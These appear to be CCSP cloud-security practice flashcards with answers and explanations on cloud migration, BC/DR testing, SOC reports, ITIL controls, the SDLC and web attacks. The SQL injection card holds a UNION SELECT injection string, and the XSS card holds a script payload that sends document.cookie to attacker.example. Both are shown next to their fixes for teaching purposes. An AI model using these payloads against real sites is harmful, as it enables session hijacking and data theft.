Pocket Prep 6 Flashcards

1
Q

Aden works for a large corporation that maintains its own traditional data center. They are beginning the work of planning their move to the cloud. They are going to build an Infrastructure as a Service (IaaS) environment in a public cloud provider and eventually shut down their data center. What can they expect in this move?

A. There will be close to the same number of physical machines in the virtual environment, but a few more
B. There will be close to the same number of physical machines in the virtual environment, but a few less
C. The number of virtual machines will mirror the number of physical servers that they previously had
D. The number of virtual machines will be much greater than the number of physical machines that they had

A

D. The number of virtual machines will be much greater than the number of physical machines that they had

Explanation:
Correct answer: The number of virtual machines will be much greater than the number of physical machines that they had

Moving from a physical data center to a virtual data center in an IaaS should not be a lift and shift. The number of virtual machines will not resemble the number of physical machines that they had. The data center should be redesigned from a data-centric point of view. The physical servers are likely, at best, at 25% utilization in the physical data center. As they build the IaaS, replicating those servers one-for-one is no longer the focus. The questions become where the data is, who needs it, when, and in what format. They can build containers for some of the deployments, build serverless Platform as a Service (PaaS) for other parts, and then deploy some Software as a Service (SaaS) for other parts of the business.

Lift and shift is never a good thing when moving from physical to virtual data centers.
Reference:

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 113-114.

2
Q

A bad actor is targeting a cloud web application. She was able to send a properly formatted SELECT statement through one of the input fields. This returned data about the database that she could use to further attack the application.

What is the name of this type of attack?

A. Security misconfiguration
B. Cross-site request forgery (CSRF)
C. Cross-site scripting (XSS)
D. Structured Query Language (SQL) injection

A

D. Structured Query Language (SQL) injection

Explanation:
An SQL injection attack occurs when an attacker is able to send a properly formatted SQL command, which includes SELECT statements, through one of the input fields in the web application. This malicious query can return information about the database that should not be publicly available. To prevent injection attacks, it’s important to ensure that any data sent through an input field is properly sanitized and validated.
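To make the mechanism concrete, here is a hedged, minimal Python sketch (not from the referenced texts) using the standard-library sqlite3 module. The table, column names, and payload are invented for illustration; the sketch contrasts a query built by string concatenation, which lets a crafted SELECT/UNION payload return database metadata, with a parameterized query that binds the input strictly as data.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

# Input a bad actor might submit through the web form (hypothetical payload).
user_input = "' UNION SELECT name, sql FROM sqlite_master --"

# Vulnerable: the input is concatenated into the SQL text, so the injected
# UNION SELECT runs as part of the query and leaks schema information.
vulnerable_sql = "SELECT username, email FROM users WHERE username = '" + user_input + "'"
print(conn.execute(vulnerable_sql).fetchall())

# Safer: a parameterized query binds the input as a value, never as SQL syntax.
safe_sql = "SELECT username, email FROM users WHERE username = ?"
print(conn.execute(safe_sql, (user_input,)).fetchall())  # returns no rows
```

Parameterized queries, combined with input validation, are the kind of sanitization the explanation describes.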

XSS is an attack against the user’s browser and the user’s trust in the website. There are three types of XSS: DOM, Reflected, and Stored.

CSRF tricks the user into performing actions they would not otherwise have taken. It abuses the trust the server has in the user's authenticated browser session.

Security misconfiguration involves the inappropriate configuration of software. The more customizable the software is, the more likely it is that a misconfiguration will occur.
Reference:

(ISC)² CCSP Certified Cloud Security Professional Official Study Guide, 3rd Edition. Pg 105-106.

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 143.

3
Q

A corporation has hired Adit as the information security manager responsible for Business Continuity Management (BCM) throughout the business. The current plan that Adit and his team are working on is the critical plan that the incident responders will utilize if there is an event such as a fire or earthquake that affects the data center. The assumption they are working under is that the facility itself will be destroyed and they will need to move operations to a different location, at least temporarily.

Which type of document would this be?

A. Business Continuity Plan (BCP)
B. Incident Response Plan (IRP)
C. Acceptable Use Policy (AUP)
D. Disaster Recovery Plan (DRP)

A

D. Disaster Recovery Plan (DRP)

Explanation:
The US NIST defines DRPs as “a written plan for processing critical applications in the event of a major hardware or software failure or destruction of facilities.” The DRP is most commonly considered a component of the business continuity plan. The BCP is defined by NIST as “the documentation of a predetermined set of instructions or procedures that describe how an organization’s mission/business processes will be sustained during and after a significant disruption.” Because the scenario is about the physical destruction of the data center facility and its hardware and software, the DRP is the more specific plan.

It is worth noting that the distinction between BCP and DRP is debatable. However, this is the more prevalent interpretation and the one (ISC)² appears to follow.

IRPs are defined by NIST as “the documentation of a predetermined set of instructions or procedures to detect, respond to, and limit consequences of a malicious cyber attack against an organization’s information system(s).”

The AUP informs users of the acceptable uses of resources such as their phones, computers, internet, and data.
Reference:

(ISC)² CCSP Certified Cloud Security Professional Official Study Guide, 3rd Edition. Pg 232-237.

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 131-132.

4
Q

Jia is working on the DevSecOps team as the information security professional. The developers are in the planning stage of the application and are working on the Application Programming Interface (API). The API protocol of choice is REpresentational State Transfer (REST). It is important to ensure that the communication between the applications is protected from prying eyes.

How would this be done?

A. Internet Protocol Security (IPSec)
B. Transport Layer Security (TLS)
C. Message Digest 5 (MD5)
D. Rivest-Shamir-Adleman (RSA)

A

B. Transport Layer Security (TLS)

Explanation:
REST uses the basic HyperText Transfer Protocol (HTTP), so it can utilize TLS. TLS is the successor to Secure Sockets Layer (SSL), which was originally designed to protect web browser traffic, so it works well here.
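As a small, hedged illustration (not from the cited references), the Python sketch below makes a REST-style call over HTTPS using only the standard library; the endpoint URL is a placeholder. Because REST rides on HTTP, pointing the client at an https:// URL wraps the whole request/response exchange in TLS, and the default SSL context verifies the server's certificate.

```python
import json
import ssl
import urllib.request

# Hypothetical REST endpoint, used purely for illustration.
url = "https://api.example.com/v1/orders/42"

# create_default_context() turns on certificate verification and hostname
# checking, so the HTTP exchange that carries the REST call is wrapped in TLS.
context = ssl.create_default_context()

request = urllib.request.Request(url, headers={"Accept": "application/json"})
with urllib.request.urlopen(request, context=context) as response:
    data = json.loads(response.read().decode("utf-8"))
    print(data)
```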

IPSec is a network layer protocol that is commonly used to protect connections between routers separated by a Wide Area Network (WAN) or for user Virtual Private Network (VPN) connections.

RSA is an asymmetric algorithm that is used to exchange symmetric keys and to create digital signatures to allow authentication of who or what is on the other side of the network.

MD5 is a hashing algorithm that is used to check integrity. Both RSA and MD5 could be algorithms used within the TLS connection, but they do not make for good answers because the data in transit would be encrypted with a symmetric algorithm, likely the Advanced Encryption Standard (AES).
Reference:

(ISC)² CCSP Certified Cloud Security Professional Official Study Guide, 3rd Edition. Pg 159-163.

The Official (ISC)² CCSP CBK Reference, 4th Edition.

5
Q

Which of the following statements regarding type 2 hypervisors is TRUE?
A. Due to being software based, they are more vulnerable to flaws and exploits than type 1 hypervisors
B. Due to being hardware based, it’s less likely that an attacker will be able to inject malicious code into the hypervisor
C. Due to being software based, it’s less likely that an attacker will be able to inject malicious code into the hypervisor
D. Due to being hardware based, they are more vulnerable to flaws and exploits than type 1 hypervisors

A

A. Due to being software based, they are more vulnerable to flaws and exploits than type 1 hypervisors

Explanation:

Correct answer: Due to being software based, they are more vulnerable to flaws and exploits than type 1 hypervisors

Type 2 hypervisors are software based and run on top of a host operating system rather than directly on the hardware. This can make type 2 hypervisors more vulnerable to flaws and software exploits than type 1 hypervisors.

Since type 1 hypervisors are tied into the physical hardware of the machine, it can be more difficult to inject malicious code.

A type 2 hypervisor also involves more lines of code: there is the host operating system, then the type 2 hypervisor on top of it, and then another full operating system for each guest virtual machine. More lines of code mean more possible flaws, and therefore more possible ways for a bad actor to cause problems.

6
Q

The corporate SOC has a core role in which of the following types of operational controls and standards?

A. Configuration Management
B. Service Level Management
C. Deployment Management
D. Incident Management

A

D. Incident Management

Explanation:
Standards such as the Information Technology Infrastructure Library (ITIL) and International Organization for Standardization/International Electrotechnical Commission (ISO/IEC) 20000-1 define operational controls and standards, including:

Change Management: Change management defines a process for changes to software, processes, etc., reducing the risk that systems will break due to poorly managed changes. A formal change request should be submitted and approved or denied by a change control board after a cost-benefit analysis. If approved, the change will be implemented and tested. The team should also have a plan for how to roll back the change if something goes wrong.
Continuity Management: Continuity management involves managing events that disrupt availability. After a business impact assessment (BIA) is performed, the organization should develop and document processes for prioritizing the recovery of affected systems and maintaining operations throughout the incident.
Information Security Management: Information security management systems (ISMSs) define a consistent, company-wide method for managing cybersecurity risks and ensuring the confidentiality, integrity, and availability of corporate data and systems. Relevant frameworks include the ISO 27000 series, the NIST Risk Management Framework (RMF), and AICPA SOC 2.
Continual Service Improvement Management: Continual service improvement management involves monitoring and measuring an organization’s security and IT services. This practice should be focused on continuous improvement, and an important aspect is ensuring that metrics accurately reflect the current state and potential progress.
Incident Management: Incident management refers to addressing unexpected events that have a harmful impact on the organization. Most incidents are managed by the corporate security operations center (SOC), which should have a defined and documented process in place for identifying and prioritizing incidents, notifying stakeholders, and remediating the incident.
Problem Management: Problems are the root causes of incidents, and problem management involves identifying and addressing these issues to prevent or reduce the impact of future incidents. The organization should track known incidents and have steps documented to fix them or workarounds to provide a temporary fix.
Release Management: Agile methodologies speed up the development cycle and leverage automated CI/CD pipelines to enable frequent releases. Release management processes ensure that software has passed required tests and manage the logistics of the release (scheduling, post-release testing, etc.).
Deployment Management: Deployment management involves managing the process from code being committed to a repository to it being deployed to users. In automated CI/CD pipelines, the focus is on automating testing, integration, and deployment processes. Otherwise, an organization may have processes in place to perform periodic, manual deployments.
Configuration Management: Configuration errors can render software insecure and place the organization at risk. Configuration management processes formalize the process of defining and updating the approved configuration to ensure that systems are configured to a secure state. Infrastructure as Code (IaC) provides a way to automate and standardize configuration management by building and configuring systems based on provided definition files.
Service Level Management: Service level management deals with IT’s ability to provide services and meet service level agreements (SLAs). For example, IT may have SLAs for availability, performance, number of concurrent users, customer support response times, etc.
Availability Management: Availability management ensures that services will be up and usable. Redundancy and resiliency are crucial to availability. Additionally, cloud customers will be partially responsible for the availability of their services (depending on the service model).
Capacity Management: Capacity management refers to ensuring that a service provider has the necessary resources available to meet demand. With resource pooling, a cloud provider has fewer resources than all of its users could consume at once and relies on them not using all of their resources at the same time. Often, capacity guarantees are mandated in SLAs.

Reference:

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 212-228.

7
Q

Which of the following can make it difficult for a software developer using a public cloud to receive a security certification for their application?

A. The cost of auditing a cloud environment is much higher than the cost of auditing a physical data center
B. Many regulations require that applications be built in physical data centers to be considered secure
C. Cloud environments are inherently less secure than other physical environments
D. The cloud provider may not be willing to allow auditors the level of access needed to certify their environment

A

D. The cloud provider may not be willing to allow auditors the level of access needed to certify their environment

Explanation:
Correct answer: The cloud provider may not be willing to allow auditors the level of access needed to certify their environment

In many cases, to meet regulatory requirements, the underlying infrastructure and hosting environment of an application must undergo auditing before the application residing there can be certified. This can be a problem for applications hosted in the cloud, especially in a public cloud. The cloud provider may not be willing to allow auditors the access needed to certify their environment. The cloud provider may also be unwilling or unable to meet the requirements necessary for certification.

Cloud environments can be physically more secure than other environments; it depends on the specific cloud provider and how their security compares with the company's own data center security.

Regulations do not require that applications be built in physical data centers to be considered secure. Instead, there are rules about what the company must ensure exists, such as firewalls, or requirements that data be accurate.

Auditing a cloud data center is not inherently more expensive than auditing a traditional data center; the cost depends on who is doing the auditing and the scope of the audit.
Reference:

(ISC)² CCSP Certified Cloud Security Professional Official Study Guide, 3rd Edition. Pg 175-176.

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 161-162.

8
Q

Which type of SOC report provides the MOST reliable guarantee that a service provider can meet its SLAs?

A. SOC 3
B. SOC 1
C. SOC 2 Type II
D. SOC 2 Type I

A

C. SOC 2 Type II

Explanation:
Service Organization Control (SOC) reports are audit reports defined by the American Institute of CPAs (AICPA). The three types of SOC reports are:

SOC 1: SOC 1 reports focus on financial controls and are used to assess an organization’s financial stability.
SOC 2: SOC 2 reports assess an organization's controls in different areas, including Security, Availability, Processing Integrity, Confidentiality, or Privacy. Only the Security area is mandatory in a SOC 2 report.
SOC 3: SOC 3 reports provide a high-level summary of the controls that are tested in a SOC 2 report but lack the same detail. SOC 3 reports are intended for general dissemination.

SOC 2 reports can also be classified as Type I or Type II. A Type I report is based on an analysis of an organization’s control designs but does not test the controls themselves. A Type II report is more comprehensive, as it tests the effectiveness and sustainability of the controls through a more extended audit.
Reference:

(ISC)2 CCSP Certified Cloud Security Professional Official Study Guide, 3rd Edition. Pg 287-288.

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 285-287.

9
Q

A cloud provider is expanding into a new region. They have been looking for the right location for their new data center. They have found an existing building that they could use, but the location is not ideal. They have also found a lot that is in a great location but has no building.

When considering options for choosing a data center, which option will give the organization the MOST control over all aspects of the data center?

A. Building
B. Renting
C. Leasing
D. Subletting

A

A. Building

Explanation:
Organizations that are able to build their own data centers will have the most input into everything from physical security to all other aspects of the setup.

However, buying, subletting, or leasing space in an already built data center is a much quicker and easier option for many organizations.
Reference:

(ISC)² CCSP Certified Cloud Security Professional Official Study Guide, 3rd Edition. Pg 193-194.

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 113-119.

10
Q

The Privacy Management Framework (PMF), formerly known as the Generally Accepted Privacy Principles (GAPP) standard, was created to help businesses create and manage a privacy framework within their organization. If a business fails to do this and to inform its customers of its privacy policy, which of the nine PMF principles has it violated?

A. Agreement, notice, and communication
B. Collection and creation
C. Monitoring and enforcement
D. Data integrity and quality

A

A. Agreement, notice, and communication

Explanation:
Correct answer: Agreement, notice, and communication

The PMF replaced the GAPP standard in 2022. It was developed by the American Institute of Certified Public Accountants (AICPA) and the Canadian Institute of Chartered Accountants (CICA). The standard includes nine privacy principles to manage and prevent threats to privacy.

Agreement, notice, and communication is about having a privacy policy and informing your customers of it.

Collection and creation is where the business defines what data will and will not be collected from its customers.

Data integrity and quality is about the company ensuring that when they collect data, it is correct and that they maintain that accuracy in their databases.

Monitoring and enforcement is about the company ensuring that they are reviewing the actions of their users to ensure that data is collected, maintained, managed, and disposed of according to their corporate policy and their privacy notice.

11
Q

Anna was browsing a web page in the course of her work. She clicked through several different pages in search of a piece of information that she needed to complete a project. Over the course of the next few days, she noticed strange messages within her corporate account indicating that the actions she was requesting could not be performed. However, she had not made any such requests.

What attack could she have encountered?

A. Broken access control
B. Cross-site scripting
C. Vulnerable and outdated components
D. Software and data integrity failure

A

B. Cross-site scripting

Explanation:
It appears that her session was hijacked, and the bad actor was trying to get into areas of the application that she was not allowed to access. A cross-site scripting (XSS) attack occurs when an attacker is able to inject malicious code into a web application. While this type of attack is mainly used to execute scripts and hijack a user’s session, it can also be used to deface or edit a web page without going through any authentication processes. The web application runs the injected scripts without validating them. There are three types of XSS: reflected, DOM, and stored XSS.
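To make this concrete, here is a hedged, minimal Python sketch (not from the study guides) of the root cause and the basic output-encoding mitigation, using the standard-library html module. The comment payload and page template are invented for illustration.

```python
import html

# Input a bad actor might submit through a comment field (hypothetical payload).
user_comment = '<script>fetch("https://attacker.example/steal?c=" + document.cookie)</script>'

# Vulnerable: the raw input is placed straight into the page, so the browser
# executes the injected script in the victim's session (XSS).
unsafe_page = f"<p>Latest comment: {user_comment}</p>"

# Mitigated: html.escape() converts <, >, &, and quotes to entities, so the
# payload is displayed as text instead of being executed.
safe_page = f"<p>Latest comment: {html.escape(user_comment)}</p>"

print(unsafe_page)
print(safe_page)
```

Output encoding like this, together with input validation and a Content Security Policy, is the standard mitigation for the injected-script behavior described above.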

It is possible that the XSS attack was made possible by a vulnerable or outdated component. However, the scenario is more specific to XSS.

Broken access control could also be a problem, but the clue in the question is the clicking through web pages.

Software and data integrity failures include issues such as insecure deserialization, which is an API failure.

12
Q

A cloud administrator needs to access the cloud environment remotely for administration purposes. The administrator needs to patch an existing virtual machine image and then use orchestration to cause the existing running machines to restart from the newly patched image. What tool would they use for this purpose?

A. Secure Shell (SSH)
B. Transport Layer Security (TLS)
C. Management plane
D. A secure console

A

C. Management plane

Explanation:
The management plane is the way an administrator or operator would access their Infrastructure as a Service (IaaS) environment to patch and deploy those newly patched images.
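As a hedged sketch only (the card's references do not include code), the Python snippet below shows the general idea of doing this through a cloud provider's management-plane API rather than logging in to each machine individually. It uses the AWS boto3 SDK; the instance IDs, image name, and instance type are placeholders, and real orchestration concerns (health checks, auto scaling group updates, draining traffic) are omitted.

```python
import boto3

# All identifiers below are placeholders used purely for illustration.
ec2 = boto3.client("ec2", region_name="us-east-1")

# 1. Capture a new image from the instance that was just patched.
image = ec2.create_image(
    InstanceId="i-0123456789abcdef0",
    Name="web-baseline-patched",
)
ec2.get_waiter("image_available").wait(ImageIds=[image["ImageId"]])

# 2. Launch a replacement VM from the freshly patched image; at scale, an
#    orchestration layer (auto scaling, IaC templates) would drive this step.
ec2.run_instances(
    ImageId=image["ImageId"],
    InstanceType="t3.micro",
    MinCount=1,
    MaxCount=1,
)

# 3. Retire the old, unpatched instance once the replacement is healthy.
ec2.terminate_instances(InstanceIds=["i-0123456789abcdef0"])
```

The point of the sketch is that all of these actions go through the provider's management plane (its API), which is why that is the correct answer rather than SSH or a console session to individual machines.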

SSH and TLS are encryption methods that are used to secure the connections to the management plane. However, they are not the best answers because the question is about updating virtual machine images and then probably using orchestration to deploy them.

A secure console could be used in the data center to configure newly deployed servers, routers, and switches.

13
Q

Zoe and her business continuity management team have decided that the best cloud option that they could use for their business is to set up a different availability zone as their failover location. In testing their Business Continuity / Disaster Recovery (BC/DR) plan, Zoe’s team has brought their recovery cloud online in the western half of the United States to an operational state of readiness, while leaving their primary site active and operational in the eastern half of the United States.

What type of test was conducted in this scenario?

A. Full interruption test
B. Simulation test
C. Parallel test
D. Tabletop test

A

C. Parallel test

Explanation:
A parallel test is a type of test for Business Continuity / Disaster Recovery (BC/DR) plans in which the recovery site is brought online to a state of operational readiness, but operations at the primary site are also maintained and active. A parallel test brings the alternate or backup systems online without taking the primary systems offline.

There are a few different sets of names that someone can use when they are discussing BC/DR tests. A tabletop test is also known as a structured walk through. This type of test is done in a conference room where the team verbally walks through the plan.

A simulation test is also called a dry run. The other systems are not brought online, but maybe the call tree is activated. In a cloud data center, this could be a fire drill.

If operations are switched from the primary systems to the backup systems, this could be called a full test or a full interruption test.

14
Q

The Cloud Service Provider (CSP) is responsible for security of the cloud, and the Cloud Consumer (CC) is responsible for security in the cloud. What cloud security model is this referring to?

A. Shared responsibility
B. Enterprise Architecture
C. Well Architected Framework
D. Resiliency

A

A. Shared responsibility

Explanation:
The shared responsibility model divides responsibility between the CSP and the CC. Who is responsible for what depends on what has been negotiated, on the service model (Infrastructure, Platform, or Software as a Service), and on the vendor and their decisions.

The Well Architected Framework is a security framework from Microsoft Azure and Amazon AWS. It defines best practices that should be used for cloud security.

The Enterprise Architecture is from the Cloud Security Alliance. It was formerly known as the Trusted Cloud Initiative. This was designed to help guide a business through designing a secure cloud structure.

Resiliency is the concept that redundancy should be added to ensure that systems are available when needed.

15
Q

The main goal of the European Union’s (EU) General Data Protection Regulation (GDPR) is to ensure that individuals’ personal data is protected for/from . . .

A. Repudiation purposes
B. Confidentiality purposes
C. Integrity purposes
D. Availability purposes

A

B. Confidentiality purposes

Explanation:
The main goal of GDPR is to ensure that individuals’ personal data is protected for confidentiality purposes. There is more involved concerning this topic, but this is the fundamental basis.

Availability is ensuring that data and systems are available to those that need it, when they need it.

Integrity is ensuring that the data remains as it is—that it is not corrupted, changed, or modified by anyone who is not authorized to do so and ensuring that it is not tampered with.

Repudiation is the ability for someone to deny or argue that they did something. We talk about nonrepudiation with digital signatures to ensure that we know who created or sent something.

16
Q

An organization may embrace infrastructure as code (IaC) to enhance its processes in which of the following areas?

A. Release Management
B. Configuration Management
C. Deployment Management
D. Change Management

A

B. Configuration Management

Explanation:
Standards such as the Information Technology Infrastructure Library (ITIL) and International Organization for Standardization/International Electrotechnical Commission (ISO/IEC) 20000-1 define operational controls and standards, including:

Change Management: Change management defines a process for changes to software, processes, etc., reducing the risk that systems will break due to poorly managed changes. A formal change request should be submitted and approved or denied by a change control board after a cost-benefit analysis. If approved, the change will be implemented and tested. The team should also have a plan for how to roll back the change if something goes wrong.
Continuity Management: Continuity management involves managing events that disrupt availability. After a business impact assessment (BIA) is performed, the organization should develop and document processes for prioritizing the recovery of affected systems and maintaining operations throughout the incident.
Information Security Management: Information security management systems (ISMSs) define a consistent, company-wide method for managing cybersecurity risks and ensuring the confidentiality, integrity, and availability of corporate data and systems. Relevant frameworks include the ISO 27000 series, the NIST Risk Management Framework (RMF), and AICPA SOC 2.
Continual Service Improvement Management: Continual service improvement management involves monitoring and measuring an organization’s security and IT services. This practice should be focused on continuous improvement, and an important aspect is ensuring that metrics accurately reflect the current state and potential progress.
Incident Management: Incident management refers to addressing unexpected events that have a harmful impact on the organization. Most incidents are managed by a corporate security team, which should have a defined and documented process in place for identifying and prioritizing incidents, notifying stakeholders, and remediating the incident.
Problem Management: Problems are the root causes of incidents, and problem management involves identifying and addressing these issues to prevent or reduce the impact of future incidents. The organization should track known incidents and have steps documented to fix them or workarounds to provide a temporary fix.
Release Management: Agile methodologies speed up the development cycle and leverage automated CI/CD pipelines to enable frequent releases. Release management processes ensure that software has passed required tests and manage the logistics of the release (scheduling, post-release testing, etc.).
Deployment Management: Deployment management involves managing the process from code being committed to a repository to it being deployed to users. In automated CI/CD pipelines, the focus is on automating testing, integration, and deployment processes. Otherwise, an organization may have processes in place to perform periodic, manual deployments.
Configuration Management: Configuration errors can render software insecure and place the organization at risk. Configuration management processes formalize the process of defining and updating the approved configuration to ensure that systems are configured to a secure state. Infrastructure as Code (IaC) provides a way to automate and standardize configuration management by building and configuring systems based on provided definition files (a minimal sketch of this idea follows the list below).
Service Level Management: Service level management deals with IT’s ability to provide services and meet service level agreements (SLAs). For example, IT may have SLAs for availability, performance, number of concurrent users, customer support response times, etc.
Availability Management: Availability management ensures that services will be up and usable. Redundancy and resiliency are crucial to availability. Additionally, cloud customers will be partially responsible for the availability of their services (depending on the service model).
Capacity Management: Capacity management refers to ensuring that a service provider has the necessary resources available to meet demand. With resource pooling, a cloud provider has fewer resources than all of its users could consume at once and relies on them not using all of their resources at the same time. Often, capacity guarantees are mandated in SLAs.
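As noted under Configuration Management above, here is a hedged, minimal Python sketch of the IaC idea, not tied to any real tool such as Terraform or Ansible: desired state is declared in a definition document kept in version control, and an apply step converges the (pretend) current state toward it idempotently. All resource names and settings are invented.

```python
import json

# Desired configuration, as it might be kept in version control.
DESIRED_STATE = json.loads("""
{
    "web-server": {"open_ports": [443], "tls_min_version": "1.2"},
    "db-server":  {"open_ports": [5432], "encryption_at_rest": true}
}
""")

# Pretend inventory of what is currently deployed.
current_state = {
    "web-server": {"open_ports": [80, 443], "tls_min_version": "1.0"},
}

def apply(desired: dict, current: dict) -> None:
    """Converge the current state toward the declared definition."""
    for resource, settings in desired.items():
        if resource not in current:
            print(f"CREATE {resource} with {settings}")
        elif current[resource] != settings:
            print(f"UPDATE {resource}: {current[resource]} -> {settings}")
        else:
            print(f"NO CHANGE for {resource}")

apply(DESIRED_STATE, current_state)
```

Because the definition file is the source of truth, re-running the apply step produces the same secure configuration every time, which is what makes IaC attractive for configuration management.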
17
Q

Which of the following is the LEAST disruptive type of exercise in which the participants carry out all of the actions of the BCP?

A. Simulation
B. Parallel Test
C. Tabletop Exercise
D. Full Test

A

B. Parallel Test

Explanation:
Business continuity/disaster recovery plan (BCP/DRP) testing can be performed in various ways. Some of the main types of tests include:

Tabletop Exercises: In a tabletop exercise, the participants talk through a provided scenario. They say what they would do in a situation but take no real actions.
Simulation/Dry Run: A simulation involves working and talking through a scenario like a tabletop exercise. However, the participants may take limited, non-disruptive actions, such as spinning up backup cloud resources that would be used during a real incident.
Parallel Test: In a parallel test, the full BC/DR process is carried out alongside production systems. In a parallel test, the BCP/DRP steps are actually performed.
Full Test:  In a full test, primary systems are taken down as they would be in the simulated event. This test ensures that the BCP/DRP systems and processes are capable of maintaining and restoring operations.
18
Q

Esti is working with the cloud operators as an information security manager. They are currently working to ensure that the web browser version deployed for users to access the Software as a Service (SaaS) they have subscribed to is compliant with their policies and baselines. They are checking the client browsers to ensure they meet the corporate security standards and baselines for the protection of data.

This can help to mitigate which vulnerability?

A. Insufficient logging
B. XML external entities
C. Injection
D. Cryptographic failures

A

D. Cryptographic failures

Explanation:
Cryptographic failures (formerly Sensitive data exposure) refer to vulnerabilities or weaknesses in the implementation or use of cryptographic algorithms and mechanisms, leading to the compromise of sensitive data. It includes:

Weak encryption algorithms
Insecure key management
Insufficient key length
Insecure random number generation
etc.
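As a hedged, minimal Python sketch (not from the cited sources), the snippet below touches two of the items in the list above: insecure random number generation versus the cryptographically strong secrets module, and pinning a minimum TLS version on a client-side SSL context so that weak protocol versions are refused.

```python
import random
import secrets
import ssl

# Insecure: random is a predictable PRNG and must not be used for tokens/keys.
weak_token = "".join(random.choices("0123456789abcdef", k=32))

# Better: secrets draws from a CSPRNG intended for security-sensitive values.
strong_token = secrets.token_hex(16)

# Refuse legacy protocol versions on outbound (client-side) connections.
context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.TLSv1_2

print(weak_token, strong_token, context.minimum_version, sep="\n")
```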

XML External Entities (XXE) is a security vulnerability that occurs when an application processes XML input in an insecure manner, allowing an attacker to include external entities or files that can be maliciously exploited.

Injection refers to a type of attack where malicious code is injected into an application’s input fields or parameters, allowing an attacker to manipulate the application’s behavior and gain unauthorized access to data or execute arbitrary commands, including SQL and OS commands.

Insufficient logging is just that, not enough logging. We do not know what happened unless we can see the logs. Logging does not protect the data.

Injection is more directly related to the websites themselves. In this scenario, Esti and the team are checking the browser. There are many cryptographic settings within the browser itself.

19
Q

During which phase of the SDLC should test cases be created for the identified requirements?

A. Development
B. Testing
C. Requirements
D. Design

A

D. Design

Explanation:
The Software Development Lifecycle (SDLC) describes the main phases of software development from initial planning to end-of-life. While definitions of the phases differ, one commonly-used description includes these phases:

Requirements: During the requirements phase, the team identifies the software's role and the applicable requirements. This includes business, functional, and security requirements.
Design: During this phase, the team creates a plan for the software that fulfills the previously identified requirements. Often, this is an iterative process as the design moves from high-level plans to specific ones. Also, the team may develop test cases during this phase to verify the software against requirements.
Development: This phase is when the software is written. It includes everything up to the actual build of the software, and unit testing should be performed regularly through the development phase to verify that individual components meet requirements.
Testing: After the software has been built, it undergoes more extensive testing. This should verify the software against all test cases and ensure that they map back to and fulfill all of the software’s requirements.
Deployment: During the deployment phase, the software moves from development to release. During this phase, the default configurations of the software are defined and reviewed to ensure that they are secure and hardened against potential attacks.
Operations and Maintenance (O&M): The O&M phase covers the software from release to end-of-life. During O&M, the software should undergo regular monitoring, testing, etc., to ensure that it remains secure and fit for purpose.
20
Q

What is generally part of the development coding phase of the Secure Software Development Life Cycle (SSDLC)?

A. Acceptance testing
B. Functional testing
C. Unit testing
D. Usability testing

A

C. Unit testing

Explanation:
The coding phase of the SSDLC covers the generation of software components as well as integrations and the building of the overall solution. Unit testing is part of the coding process. This is a developer’s test of the modules that are being developed as part of a larger architecture. All the module’s pathways must be tested.
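As an illustrative sketch only (not from the referenced material), the snippet below shows the kind of developer-level unit test described here: a small hypothetical module, classify_password, with one test per pathway, written with Python's built-in unittest framework.

```python
import unittest

def classify_password(password: str) -> str:
    """Hypothetical module under test: classify password strength."""
    if len(password) < 8:
        return "weak"
    if any(c.isdigit() for c in password) and any(c.isalpha() for c in password):
        return "strong"
    return "medium"

class ClassifyPasswordTests(unittest.TestCase):
    # One test per pathway through the module, as unit testing requires.
    def test_short_password_is_weak(self):
        self.assertEqual(classify_password("abc123"), "weak")

    def test_mixed_long_password_is_strong(self):
        self.assertEqual(classify_password("abc123xyz789"), "strong")

    def test_long_single_class_password_is_medium(self):
        self.assertEqual(classify_password("abcdefghij"), "medium")

if __name__ == "__main__":
    unittest.main()
```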

Functional testing is a way to test the features of the application. This is best done after the bulk of the coding is complete.

Usability testing is also a way to test the application with people who represent the users.

Acceptance testing is a way to test the application to see to what degree it meets the user’s requirements.
